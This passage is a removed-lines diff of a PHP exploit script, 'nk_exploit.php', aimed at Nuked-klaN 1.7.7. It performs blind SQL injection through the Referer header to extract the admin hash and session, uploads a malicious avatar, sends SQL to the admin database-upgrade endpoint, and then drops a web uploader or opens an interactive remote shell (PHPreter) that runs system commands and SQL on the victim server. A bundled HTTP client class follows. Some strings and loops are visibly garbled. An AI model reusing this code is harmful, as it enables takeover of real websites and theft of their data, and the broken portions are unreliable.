-			unset($this->queries['name']);
-			unset($this->queries['password']);
-		}
-		
-		foreach($this->queries as $key => $query)
-		{
-			$length = $key == 'password' ? 32 : 20;
-			
-			if($key == 'sid')
-			{
-				$query = str_replace
-				(
-					'(' . $this->queries['uid'] . ')',
-					"'" . $this->admin['uid'] . "'",
-					$query
-				);
-			}
-				
-			switch($key)
-			{
-				case 'name':     $display = 'User      : '; break;
-				case 'password': $display = 'Password  : '; break;
-				case 'sid':      $display = 'SessionID : '; break;
-				case 'uid':      $display = 'UserID    : '; break;
-			}
-			
-			$this->msg($display, MSG_QUESTION, false);
-			if(!($this->admin[$key] = $this->blind($query, $length))) return true;
-			$this->msg($display . $this->admin[$key], MSG_OKAY);
-		}
-		
-		return true;
-	}
-	
-	# SQL Blind function
-	# Referer SQL field only supports 200 characters,
-	# so we use a special sql injection to be sure it
-	# will work fine and fast enought.
-	#
-	# 1. Charset
-	# 2. Dichotomy
-	#
-	function blind($query, $nbchars)
-	{
-		$result  = '';
-		
-		for($p=1;$p<=$nbchars;$p++)
-		{
-			$letter = '';
-			$sql    = "MID(($query),$p,1)";
-			
-			if($this->blind_is($sql))
-			{
-				if($this->blind_isChar($sql))
-				{		
-					if($this->blind_isMaj($sql))
-						$charset = array(ord('A'), ord('Z'));
-					else
-						$charset = array(ord('a'), ord('z'));
-				}
-				else
-					$charset = array(ord('0'), ord('9'));
-			}
-			else
-				break;
-				
-			$add = $charset[0];
-			
-			for($pos=$charset[1]-$charset[0];$pos>2;$pos=intval($pos/2+0.5))
-			{
-				$s = 'ORD(' . $sql . ') BETWEEN ' . $add . ' AND ' . ($add+$pos);
-				if(!$this->blind_test($s)) $add += $pos;
-			}
-			
-			$letter = '';
-			
-			for($i=$add;$i<=$add+$pos+1;$i++)
-			{
-				$s = 'ORD(' . $sql . ')=' . $i;
-				if($this->blind_test($s))
-				{
-					$letter = chr($i);
-					break;
-				}
-			}
-			
-			$result .= $letter;
-			print $letter;
-		}
-		
-		return $result;
-	}
-	
-	function blind_is($sql)
-	{
-		return $this->blind_test("ORD($sql)!=0");
-	}
-	
-	function blind_isChar($query)
-	{
-		return $this->blind_test("UPPER($query) BETWEEN 'A' AND 'Z'");
-	}
-	
-	function blind_isMaj($query)
-	{
-		return $this->blind_test("ORD($query) BETWEEN 65 AND 90");
-	}
-	
-	# Return true or false depending on the page result, before
-	# setting up PHPsploit and the referer
-	function blind_test($sql)
-	{
-		$site = $this->generateIP();
-		$when = '&oday=' . date('d') . '&omonth=' . date('m') . '&oyear=' . date('Y');
-		
-		$this->wwwinit(0);
-		$this->www->addheader('Referer', $this->year . $site . "' OR 1=1 AND $sql AND 'A'='A");
-		
-		# If we have to be user to reach stats
-		if(sizeof($this->user))
-		{
-			$this->www->get($this->url . 'index.php');
-			$this->wwwinit(1);
-		}
-			
-		$this->www->get($this->url . 'index.php?file=Stats&nuked_nude=visits&op=view_referer' . $when);
-		
-		if(preg_match('#' . $this->year . $site . '[^<]+\s+([0-9]*)#i', $this->www->getcontent(), $data))
-		{
-			if($data[1] > 0)
-				return true;
-		}
-		else
-		{
-			$this->msg('Error while blinding.', MSG_ERROR);
-			exit();
-		}
-	}
-		
-	# Set up the admin
-	function makeadmin()
-	{
-		# The current user is now the admin
-		$this->user = $this->admin;
-		
-		# Determine if we have a session or just a name
-		if($this->mode == 2)
-		{
-			exit();
-		}
-		elseif($this->sadmin)
-		{
-			$this->suser = $this->sadmin;
-			$this->makeuser();
-		}
-		elseif($this->user['sid'] && $this->user['uid'])
-		{
-			$this->msg('Got a session, no login required', MSG_OKAY);
-		}
-		elseif($this->user['name'] && $this->user['password'])
-		{
-			$this->msg('Please crack the admin hash, and use -admin parameter', MSG_ERROR);
-			exit();
-		}
-		else
-		{
-			$this->msg('How did you get there ?', MSG_ERROR);
-			exit();
-		}
-		
-		$this->user['aid'] = $this->user['uid'];
-		$this->user['ip']  = '127.0.0.1';
-		
-		$this->msg('Administrator status OK =)', MSG_OKAY);
-	}
-	
-	# Conclude the attack: spawn a shell or an uploader
-	function conclude()
-	{
-		# Initialise PHPsploit for the last time
-		$this->wwwinit(1);
-		$this->www->addheader('Referer', $this->url);
-		
-		# Actualize the queries
-		$this->setQueries(1);
-		
-		$this->uploadavatar();
-		$this->sendqueries();
-		$this->loadshell();
-	}
-	
-	function uploadavatar()
-	{
-		$this->msg('Uploading avatar ...', MSG_INFO, false);
-		
-		$fmdt = array
-		(
-			'frmdt_url'   => $this->url . 'index.php?file=User&op=update_pref',
-			'fichiernom'  => array
-							(
-								'frmdt_filename' => 'one.jpg',
-								'frmdt_content'  => $this->file,
-							)
-		);
-
-		$this->www->formdata($fmdt);
-		$this->www->get($this->url . 'index.php?file=User&op=edit_pref');
-		
-		if(!preg_match('#value="([^"]+\.jpg)"#U', $this->www->getcontent(), $match))
-		{
-			$this->msg('Error while uploading avatar', MSG_ERROR);
-			exit();
-		}
-		
-		$this->msg('Avatar successfully uploaded (' . basename($match[1]) . ')', MSG_OKAY);
-		
-		$match = unpack('H*', $match[1]);
-		
-		$this->queries[1] = str_replace('', $match[1], $this->queries[1]);
-	}
-	
-	function sendqueries()
-	{
-		$this->msg('Sending SQL queries ', MSG_INFO, false);
-		
-		foreach($this->queries as $query)
-		{
-			$this->www->post($this->url . 'index.php?file=Admin&page=mysql&op=upgrade_db', 'upgrade=' . $query);
-			$this->msg('.', 0, false);
-		}
-		
-		$this->msg('SQL queries sent        ', MSG_OKAY);
-	}
-	
-	function loadshell()
-	{
-		if($this->mode == 0)
-		{
-			$this->www->addheader('Shell', '1');
-			$this->www->get($this->url);
-			
-			if(strpos('--DONE--', $this->www->getcontent()))
-				$this->msg('File created. URL: ' . $this->url . 'w00t.php', MSG_OKAY);
-			else
-			{
-				# possible causes: safe_mode, open_basedir, file restrictions ...
-				$this->msg('File was not created', MSG_ERROR);
-			}
-		}
-		else
-		{
-			$this->msg('Shell spawned', MSG_OKAY);
-			$this->msg();
-			$sql = array('conf.inc.php', '$global[\'db_host\']', '$global[\'db_user\']', '$global[\'db_password\']', '$global[\'db_name\']');
-			new phpreter($this->url . 'index.php', '123456789(.*)123456789', 'cmd', $sql, false);
-		}
-	}
-	
-	# Login as a specified user, and obtain a $uid and a $sid
-	function createSession($user, $passwd, &$uid, &$sid)
-	{
-		$this->wwwinit(0);
-		$this->www->addheader('Referer', $this->url . 'index.php');
-		$this->www->post($this->url . 'index.php?file=User&nuked_nude=index&op=login', "pseudo=$user&pass=$passwd&remember_me=ok");
-		
-		preg_match('#nuked_sess_id=([a-z0-9]+)#i', $this->www->getheader(), $sid);
-		preg_match('#uid=([a-z0-9]+)#i', $this->www->getcontent(), $uid);
-		
-		$sid = $sid[1];
-		$uid = $uid[1];
-		
-		if($uid && $sid)
-			return true;
-		
-		return false;
-	}
-	
-	# Login user and set his informations
-	function makeuser()
-	{	
-		list($user, $passwd) = explode(':', $this->suser);
-		
-		$this->user = array();
-		
-		$this->msg('Logging in as ' . $user, MSG_INFO, false);
-		
-		if($this->createSession($user, $passwd, $uid, $sid))
-		{
-			$this->user['name']     = $user;
-			$this->user['password'] = $passwd;
-			$this->user['uid']      = $uid;
-			$this->user['sid']      = $sid;
-			$this->user['ip']       = $this->generateIP();
-			
-			$this->msg('Loggued in as ' . $user . ' (uid=' . $uid . ')', MSG_OKAY);
-		}
-		else
-		{
-			$this->msg('Unable to log in as ' . $user, MSG_ERROR);
-			exit();
-		}
-	}
-	
-	# Initialize PHPsploit (with a new identity)
-	function wwwinit($mode)
-	{	
-		$this->www->reset();
-		$this->www->agent(AGENT);
-		
-		if($mode && sizeof($this->user))
-			$this->wwwuser();
-		else
-			$this->www->addheader('X-Forwarded-For', $this->generateIP());
-	}
-
-	# Set user cookies and headers
-	function wwwuser()
-	{	
-		$cookies = array();
-		
-		if($this->user['uid']) $cookies['user_id']       = $this->user['uid'];
-		if($this->user['sid']) $cookies['sess_id']       = $this->user['sid'];	
-		if($this->user['aid']) $cookies['admin_session'] = $this->user['aid'];
-			
-		foreach($cookies as $k => $v)
-			$this->www->addcookie($this->cprefix . $k, $v);
-		
-		// yes it's not a cookie
-		$this->www->addheader('X-Forwarded-For', $this->user['ip']);
-	}
-	
-	# Make an IP which can be gethostbyaddr()'ed, for speed
-	# reasons
-	function generateIP()
-	{
-		do
-		{
-			$ip = IPBASE . rand(1, 20) . '.' . rand(1, 250);
-		}
-		while(in_array($ip, $this->ips));
-		
-		$this->ips[] = $ip;
-		
-		return $ip;
-	}
-	
-	function msg($msg = '', $type = 0, $n = true)
-	{
-		$display = $n ? "\r" : '';
-
-		switch($type)
-		{
-			case MSG_INFO:     $display .= '[*] '; break;
-			case MSG_OKAY:     $display .= '[+] '; break;
-			case MSG_ERROR:    $display .= '[-] '; break;
-			case MSG_QUESTION: $display .= '[?] '; break;
-		}
-
-		$display .= $msg;
-
-		$display .= $n ? "\n" : '';
-
-		print $display;
-	}
-	
-	function header()
-	{
-		$this->msg();
-		$this->msg('   Nuked-klaN 1.7.7 and SP4.4 Multiple Vulnerabilities Exploit');
-		$this->msg('     by Charles FOL ');
-		$this->msg();
-	}
-	
-	function usage()
-	{
-		global $argc;
-		
-		if($argc<3)
-		{
-			$this->msg(' usage: ./nk_exploit.php -url  [options]');
-			$this->msg();
-			$this->msg(' Options: -mode    0: Remote Upload (default)');
-			$this->msg('                   1: Remote Code Execution');
-			$this->msg('                   2: Admin Hash Extraction');
-			$this->msg('          -admin   If you have an admin account.');
-			$this->msg('          -user    If stats page need registration.');
-			$this->msg('          -proxy   If you want to use a proxy.');
-			$this->msg('          -cprefix Cookie prefix (default: nuked_).');
-			$this->msg('          -sprefix SQL prefix (default: nuked_).');
-			$this->msg('          -file    If you wanna upload a specific file');
-			$this->msg('                   else it will upload a simple uploader.');
-			$this->msg();
-			$this->msg(' eg: ./nk_exploit.php -url http://localhost/nk/ -admin real:passw0rd');
-			$this->msg(' eg: ./nk_exploit.php -url http://localhost/nk/ -file cshell.php -proxy localhost:8118');
-			
-			$this->close();
-		}
-	}
-	
-	function setParameters()
-	{
-		$this->www     = new phpsploit();
-		$this->year    = rand(1000, 1500);
-		$this->url     = $this->getParameter('url', true);
-		$this->mode    = $this->getParameter('mode', false, 0);
-		$this->suser   = $this->getParameter('user', false);
-		$this->sadmin  = $this->getParameter('admin', false);
-		$this->proxy   = $this->getParameter('proxy', false);
-		$this->cprefix = $this->getParameter('cprefix', false, 'nuked_');
-		$this->sprefix = $this->getParameter('sprefix', false, 'nuked_');
-		$this->file    = $this->getParameter('file', false);
-	}
-	
-	function controlParameters()
-	{
-		if($this->mode == 0)
-		{
-			if($this->file)
-				$this->file = file_get_contents($this->file);
-			else
-				$this->file = 'Error ".$_FILES[\'file\'][\'error\''
-				            . ']."
    ");else echo "
    File uploaded
    "; } ?>
    ';
-
-			$this->file = str_replace('', str_replace("'", "\'", $this->file), UPCODE);
-		}
-		else
-			$this->file = SHCODE;
-		
-		if($this->proxy)
-			$this->www->proxy($this->proxy);
-	}
-	
-	function getParameter($parameter, $required = false, $default = '')
-	{
-		global $argv, $argc;
-		
-		for($i=0;$i<$argc;$i++)
-		{
-			if($argv[$i] == '-' . $parameter)
-				return $argv[$i+1];
-		}
-		
-		if($required)
-		{
-			$this->msg('-' . $parameter . ' parameter is required.', MSG_ERROR);
-			$this->close();
-		}
-		
-		return $default;
-	}
-}
-
-# PHPreter (a bit modified).
-# Find original version on http://real.o-n.fr/
-
-/*
- * Copyright (c) Charles FOL
- *
- * This program is free software; you can redistribute it and/or 
- * modify it under the terms of the GNU General Public License 
- * as published by the Free Software Foundation; either version 2 
- * of the License, or (at your option) any later version. 
- * 
- * This program is distributed in the hope that it will be useful, 
- * but WITHOUT ANY WARRANTY; without even the implied warranty of 
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
- * GNU General Public License for more details. 
- * 
- * You should have received a copy of the GNU General Public License 
- * along with this program; if not, write to the Free Software 
- * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
- *
- * TITLE:          PHPreter
- * AUTHOR:         Charles FOL 
- * VERSION:        1.0
- * LICENSE:        GNU General Public License
- *
- * This is a really simple class with permits to exec SQL, PHP or CMD
- * on a remote host using the HTTP "Shell" header.
- *
- *
- * Sample code:
- * [host][sql]# mode=cmd
- * [host][cmd]# id
- * uid=2176(u47170584) gid=600(ftpusers)
- * 
- * [host][cmd]# mode=php
- * [host][php]# echo phpversion();
- * 4.4.8
- * [host][php]# mode=sql
- * [host][sql]# SELECT version(), user()
- * --------------------------------------------------
- *  version()           | 5.0.51a-log
- *  user()              | dbo225004932@74.208.16.148
- * --------------------------------------------------
- * 
- * [host][sql]#
- *
- */
-
-class phpreter
-{
-	var $url;
-	var $host;
-	var $port;
-	var $page;
-	
-	var $mode;
-	
-	var $ssql;
-	
-	var $prompt;
-	var $phost;
-	
-	var $regex;
-	var $data;
-	
-	/**
-	 * __construct()
-	 *
-	 * @param url      The url of the remote shell.
-	 * @param regexp   The regex to catch cmd result.
-	 * @param mode     Mode: php, sql or cmd.
-	 * @param sql      An array with the file to include,
-	 *                 and sql vars
-	 * @param clear    Determines if clear() is called
-	 *                 on startup
-	 */
-	function phpreter($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true)
-	{
-		$this->url = $url;
-		
-		$this->regex = '#'.$regexp.'#is';
-		
-		#
-		# Set data
-		#
-		
-		$infos         =	parse_url($this->url);
-		$this->host    =	$infos['host'];
-		$this->port    =	isset($infos['port']) ? $infos['port'] : 80;
-		$this->page    =	$infos['path'];
-		
-		# www.(site).com
-		$host_tmp      =	explode('.',$this->host);
-		$this->phost   =	$host_tmp[ count($host_tmp)-2 ];
-		
-		#
-		# Set up MySQL connection string
-		#
-		if(!sizeof($sql))
-			$this->ssql = '';
-		elseif(sizeof($sql) == 5)
-		{
-			$this->ssql = "include('$sql[0]');"
-			            . "mysql_connect($sql[1], $sql[2], $sql[3]);"
-			            . "mysql_select_db($sql[4]);";
-		}
-		else
-		{
-			$this->ssql = ""
-			            . "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');"
-			            . "mysql_select_db('$sql[3]');";
-		}
-		
-		$this->setmode($mode);
-		
-		#
-		# Main Loop
-		#
-
-		if($clear) $this->clear();
-		print $this->prompt;
-
-		while( !preg_match('#^(quit|exit|close)$#i', ($cmd = trim(fgets(STDIN)))) )
-		{
-			# change mode
-			if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array))
-				$this->setmode($array[3]);
-			
-			# clear data
-			elseif(preg_match('#^clear$#i',$cmd))
-				$this->clear();
-			
-			# else
-			else print $this->exec($cmd);
-			
-			print $this->prompt;
-		}
-	}
-	
-	/**
-	 * clear()
-	 * Just clears ouput, printing '\n'x50
-	 */
-	function clear()
-	{
-		print str_repeat("\n", 50);
-		return 0;
-	}
-	
-	/**
-	 * setmode()
-	 * Set mode (PHP, CMD, SQL)
-	 * You don't have to call it.
-	 * use mode=[php|cmd|sql] instead,
-	 * in the prompt.
-	 */
-	function setmode($newmode)
-	{
-		$this->mode = strtolower($newmode);
-		$this->prompt = '['.$this->phost.']['.$this->mode.']# ';
-		
-		switch($this->mode)
-		{
-			case 'cmd':
-				$this->data = 'system(\'\');';
-				break;
-			case 'php':
-				$this->data = '';
-				break;
-			case 'sql':
-				$this->data = $this->ssql
-				            . '$q = mysql_query(\'\') or print(str_repeat("-",50)."\n".mysql_error()."\n");'
-				            . 'print str_repeat("-",50)."\n";'
-				            . 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))'
-				            . '{'
-				            .    'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $v\n";'
-				            .    'print str_repeat("-",50)."\n";'
-				            . '}';
-				break;
-		}
-		return $this->mode;
-	}
-
-	/**
-	 * exec()
-	 * Execute any query and catch the result.
-	 * You don't have to call it.
-	 */
-	function exec($cmd)
-	{
-		if(!strlen($this->data))	$shell = $cmd;
-		else                    	$shell = str_replace('', addslashes($cmd), $this->data);
-		
-		$fp = fsockopen($this->host, $this->port, $errno, $errstr, 30);
-		
-		$req  = "GET " . $this->page . " HTTP/1.1\r\n";
-		$req .= "Host: " . $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) . "\r\n";
-		$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n";
-		$req .= "X-Forwarded-For: 127.0.0.1\r\n"; // here is the mod.
-		$req .= "Shell: $shell\r\n";
-		$req .= "Connection: close\r\n\r\n";
-
-		fputs($fp, $req);
-		
-		$content = '';
-		while(!feof($fp)) $content .= fgets($fp, 128);
-		
-		fclose($fp);
-		
-		# Remove headers
-		$data    = explode("\r\n\r\n", $content);
-		$headers = array_shift($data);
-		$content = implode("\r\n\r\n", $data);
-		
-		if(preg_match("#Transfer-Encoding:.*chunked#i", $headers))
-			$content = $this->unchunk($content);
-	
-		preg_match($this->regex, $content, $data);
-		
-		if($data[1][ strlen($data)-1 ] != "\n") $data[1] .= "\n";
-		
-		return $data[1];
-	}
-	
-	/**
-	 * unchunk()
-	 * This function aims to remove chunked content's sizes which
-	 * are put by the apache server when it uses chunked
-	 * transfert-encoding.
-	 */
-	function unchunk($data)
-	{
-		$dsize  = 1;
-		$offset = 0;
-		
-		while($dsize>0)
-		{
-			$hsize_size = strpos($data, "\r\n", $offset) - $offset;
-			
-			$dsize = hexdec(substr($data, $offset, $hsize_size));
-			
-			# Remove $hsize\r\n from $data
-			$data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) );
-			
-			$offset += $dsize;
-			
-			# Remove the \r\n before the next $hsize
-			$data = substr($data, 0, $offset) . substr($data, ($offset+2) );
-		}
-		
-		return $data;
-	}
-}
-
-# PHPsploitClass
-
-/*
- * 
- * Copyright (C) darkfig
- * 
- * This program is free software; you can redistribute it and/or 
- * modify it under the terms of the GNU General Public License 
- * as published by the Free Software Foundation; either version 2 
- * of the License, or (at your option) any later version. 
- * 
- * This program is distributed in the hope that it will be useful, 
- * but WITHOUT ANY WARRANTY; without even the implied warranty of 
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
- * GNU General Public License for more details. 
- * 
- * You should have received a copy of the GNU General Public License 
- * along with this program; if not, write to the Free Software 
- * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
- * 
- * TITLE:          PhpSploit Class
- * REQUIREMENTS:   PHP 4 / PHP 5
- * VERSION:        2.0
- * LICENSE:        GNU General Public License
- * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
- * FILENAME:       phpsploitclass.php
- *
- * CONTACT:        gmdarkfig@gmail.com (french / english)
- * GREETZ:         Sparah, Ddx39
- *
- * DESCRIPTION:
- * The phpsploit is a class implementing a web user agent.
- * You can add cookies, headers, use a proxy server with (or without) a
- * basic authentification. It supports the GET and the POST method. It can
- * also be used like a browser with the cookiejar() function (which allow
- * a server to add several cookies for the next requests) and the
- * allowredirection() function (which allow the script to follow all
- * redirections sent by the server). It can return the content (or the
- * headers) of the request. Others useful functions can be used for debugging.
- * A manual is actually in development but to know how to use it, you can
- * read the comments.
- *
- * CHANGELOG:
- *
- * [2007-06-10] (2.0)
- *  * Code: Code optimization
- *  * New: Compatible with PHP 4 by default
- *
- * [2007-01-24] (1.2)
- *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
- *  * New: multipart/form-data enctype is now supported 
- *
- * [2006-12-31] (1.1)
- *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
- *  * New: You can now call the getheader() / getcontent() function without parameters
- *
- * [2006-12-30] (1.0)
- *  * First version
- * 
- */
-
-class phpsploit
-{
-	var $proxyhost;
-	var $proxyport;
-	var $host;
-	var $path;
-	var $port;
-	var $method;
-	var $url;
-	var $packet;
-	var $proxyuser;
-	var $proxypass;
-	var $header;
-	var $cookie;
-	var $data;
-	var $boundary;
-	var $allowredirection;
-	var $last_redirection;
-	var $cookiejar;
-	var $recv;
-	var $cookie_str;
-	var $header_str;
-	var $server_content;
-	var $server_header;
-	
-
-	/**
-	 * This function is called by the
-	 * get()/post()/formdata() functions.
-	 * You don't have to call it, this is
-	 * the main function.
-	 *
-	 * @access private
-	 * @return string $this->recv ServerResponse
-	 * 
-	 */
-	function sock()
-	{
-		if(!empty($this->proxyhost) && !empty($this->proxyport))
-		   $socket = @fsockopen($this->proxyhost,$this->proxyport);
-		else
-		   $socket = @fsockopen($this->host,$this->port);
-		
-		if(!$socket)
-		   die("Error: Host seems down");
-		
-		if($this->method=='get')
-		   $this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
-		   
-		elseif($this->method=='post' or $this->method=='formdata')
-		   $this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
-		   
-		else
-		   die("Error: Invalid method");
-		
-		if(!empty($this->proxyuser))
-		   $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
-		
-		if(!empty($this->header))
-		   $this->packet .= $this->showheader();
-		   
-		if(!empty($this->cookie))
-		   $this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
-	
-		$this->packet .= 'Host: '.$this->host."\r\n";
-		$this->packet .= "Connection: Close\r\n";
-		
-		if($this->method=='post')
-		{
-			$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
-			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
-			$this->packet .= $this->data."\r\n";
-		}
-		elseif($this->method=='formdata')
-		{
-			$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
-			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
-			$this->packet .= $this->data;
-		}
-
-		$this->packet .= "\r\n";
-		$this->recv = '';
-
-		fputs($socket,$this->packet);
-
-		while(!feof($socket))
-		   $this->recv .= fgets($socket);
-
-		fclose($socket);
-
-		if($this->cookiejar)
-		   $this->getcookie();
-
-		if($this->allowredirection)
-		   return $this->getredirection();
-		else
-		   return $this->recv;
-	}
-	
-
-	/**
-	 * This function allows you to add several
-	 * cookies in the request.
-	 * 
-	 * @access  public
-	 * @param   string cookn CookieName
-	 * @param   string cookv CookieValue
-	 * @example $this->addcookie('name','value')
-	 * 
-	 */
-	function addcookie($cookn,$cookv)
-	{
-		if(!isset($this->cookie))
-		   $this->cookie = array();
-
-		$this->cookie[$cookn] = $cookv;
-	}
-
-
-	/**
-	 * This function allows you to add several
-	 * headers in the request.
-	 *
-	 * @access  public
-	 * @param   string headern HeaderName
-	 * @param   string headervalue Headervalue
-	 * @example $this->addheader('Client-IP', '128.5.2.3')
-	 * 
-	 */
-	function addheader($headern,$headervalue)
-	{
-		if(!isset($this->header))
-		   $this->header = array();
-		   
-		$this->header[$headern] = $headervalue;
-	}
-
-
-	/**
-	 * This function allows you to use an
-	 * http proxy server. Several methods
-	 * are supported.
-	 * 
-	 * @access  public
-	 * @param   string proxy ProxyHost
-	 * @param   integer proxyp ProxyPort
-	 * @example $this->proxy('localhost',8118)
-	 * @example $this->proxy('localhost:8118')
-	 * 
-	 */
-	function proxy($proxy,$proxyp='')
-	{
-		if(empty($proxyp))
-		{
-			$proxarr = explode(':',$proxy);
-			$this->proxyhost = $proxarr[0];
-			$this->proxyport = (int)$proxarr[1];
-		}
-		else 
-		{
-			$this->proxyhost = $proxy;
-			$this->proxyport = (int)$proxyp;
-		}
-
-		if($this->proxyport > 65535)
-		   die("Error: Invalid port number");
-	}
-	
-
-	/**
-	 * This function allows you to use an
-	 * http proxy server which requires a
-	 * basic authentification. Several
-	 * methods are supported:
-	 *
-	 * @access  public
-	 * @param   string proxyauth ProxyUser
-	 * @param   string proxypass ProxyPass
-	 * @example $this->proxyauth('user','pwd')
-	 * @example $this->proxyauth('user:pwd');
-	 * 
-	 */
-	function proxyauth($proxyauth,$proxypass='')
-	{
-		if(empty($proxypass))
-		{
-			$posvirg = strpos($proxyauth,':');
-			$this->proxyuser = substr($proxyauth,0,$posvirg);
-			$this->proxypass = substr($proxyauth,$posvirg+1);
-		}
-		else
-		{
-			$this->proxyuser = $proxyauth;
-			$this->proxypass = $proxypass;
-		}
-	}
-
-
-	/**
-	 * This function allows you to set
-	 * the 'User-Agent' header.
-	 * 
-	 * @access  public
-	 * @param   string useragent Agent
-	 * @example $this->agent('Firefox')
-	 * 
-	 */
-	function agent($useragent)
-	{
-		$this->addheader('User-Agent',$useragent);
-	}
-
-	
-	/**
-	 * This function returns the headers
-	 * which will be in the next request.
-	 * 
-	 * @access  public
-	 * @return  string $this->header_str Headers
-	 * @example $this->showheader()
-	 * 
-	 */
-	function showheader()
-	{
-		$this->header_str = '';
-		
-		if(!isset($this->header))
-		   return;
-		   
-		foreach($this->header as $name => $value)
-		   $this->header_str .= $name.': '.$value."\r\n";
-		   
-		return $this->header_str;
-	}
-
-	
-	/**
-	 * This function returns the cookies
-	 * which will be in the next request.
-	 * 
-	 * @access  public
-	 * @return  string $this->cookie_str Cookies
-	 * @example $this->showcookie()
-	 * 
-	 */
-	function showcookie()
-	{
-		$this->cookie_str = '';
-		
-		if(!isset($this->cookie))
-		   return;
-		
-		foreach($this->cookie as $name => $value)
-		   $this->cookie_str .= $name.'='.$value.'; ';
-
-		return $this->cookie_str;
-	}
-
-
-	/**
-	 * This function returns the last
-	 * formed http request.
-	 * 
-	 * @access  public
-	 * @return  string $this->packet HttpPacket
-	 * @example $this->showlastrequest()
-	 * 
-	 */
-	function showlastrequest()
-	{
-		if(!isset($this->packet))
-		   return;
-		else
-		   return $this->packet;
-	}
-
-
-	/**
-	 * This function sends the formed
-	 * http packet with the GET method.
-	 * 
-	 * @access  public
-	 * @param   string url Url
-	 * @return  string $this->sock()
-	 * @example $this->get('localhost/index.php?var=x')
-	 * @example $this->get('http://localhost:88/tst.php')
-	 * 
-	 */
-	function get($url)
-	{
-		$this->target($url);
-		$this->method = 'get';
-		return $this->sock();
-	}
-
-	
-	/**
-	 * This function sends the formed
-	 * http packet with the POST method.
-	 *
-	 * @access  public
-	 * @param   string url  Url
-	 * @param   string data PostData
-	 * @return  string $this->sock()
-	 * @example $this->post('http://localhost/','helo=x')
-	 * 
-	 */	
-	function post($url,$data)
-	{
-		$this->target($url);
-		$this->method = 'post';
-		$this->data = $data;
-		return $this->sock();
-	}
-	
-
-	/**
-	 * This function sends the formed http
-	 * packet with the POST method using
-	 * the multipart/form-data enctype.
-	 * 
-	 * @access  public
-	 * @param   array array FormDataArray
-	 * @return  string $this->sock()
-	 * @example $formdata = array(
-	 *                      frmdt_url => 'http://localhost/upload.php',
-	 *                      frmdt_boundary => '123456', # Optional
-	 *                      'var' => 'example',
-	 *                      'file' => array(
-	 *                                frmdt_type => 'image/gif',  # Optional
-	 *                                frmdt_transfert => 'binary' # Optional
-	 *                                frmdt_filename => 'hello.php,
-	 *                                frmdt_content => ''));
-	 *          $this->formdata($formdata);
-	 * 
-	 */
-	function formdata($array)
-	{
-		$this->target($array[frmdt_url]);
-		$this->method = 'formdata';
-		$this->data = '';
-		
-		if(!isset($array[frmdt_boundary]))
-		   $this->boundary = 'phpsploit';
-		else
-		   $this->boundary = $array[frmdt_boundary];
-
-		foreach($array as $key => $value)
-		{
-			if(!preg_match('#^frmdt_(boundary|url)#',$key))
-			{
-				$this->data .= str_repeat('-',29).$this->boundary."\r\n";
-				$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
-				
-				if(!is_array($value))
-				{
-					$this->data .= "\r\n\r\n".$value."\r\n";
-				}
-				else
-				{
-					$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
-
-					if(isset($array[$key][frmdt_type]))
-					   $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
-
-					if(isset($array[$key][frmdt_transfert]))
-					   $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
-
-					$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
-				}
-			}
-		}
-
-		$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
-		return $this->sock();
-	}
-
-	
-	/**
-	 * This function returns the content
-	 * of the server response, without
-	 * the headers.
-	 * 
-	 * @access  public
-	 * @param   string code ServerResponse
-	 * @return  string $this->server_content
-	 * @example $this->getcontent()
-	 * @example $this->getcontent($this->get('http://localhost/'))
-	 * 
-	 */
-	function getcontent($code='')
-	{
-		if(empty($code))
-		   $code = $this->recv;
-
-		$code = explode("\r\n\r\n",$code);
-		$this->server_content = '';
-		
-		for($i=1;$iserver_content .= $code[$i];
-
-		return $this->server_content;
-	}
-
-	
-	/**
-	 * This function returns the headers
-	 * of the server response, without
-	 * the content.
-	 * 
-	 * @access  public
-	 * @param   string code ServerResponse
-	 * @return  string $this->server_header
-	 * @example $this->getcontent()
-	 * @example $this->getcontent($this->post('http://localhost/','1=2'))
-	 * 
-	 */
-	function getheader($code='')
-	{
-		if(empty($code))
-		   $code = $this->recv;
-
-		$code = explode("\r\n\r\n",$code);
-		$this->server_header = $code[0];
-		
-		return $this->server_header;
-	}
-
-	
-	/**
-	 * This function is called by the
-	 * cookiejar() function. It adds the
-	 * value of the "Set-Cookie" header
-	 * in the "Cookie" header for the
-	 * next request. You don't have to
-	 * call it.
-	 * 
-	 * @access private
-	 * @param  string code ServerResponse
-	 * 
-	 */
-	function getcookie()
-	{
-		foreach(explode("\r\n",$this->getheader()) as $header)
-		{
-			if(preg_match('/set-cookie/i',$header))
-			{
-				$fequal = strpos($header,'=');
-				$fvirgu = strpos($header,';');
-				
-				// 12=strlen('set-cookie: ')
-				$cname  = substr($header,12,$fequal-12);
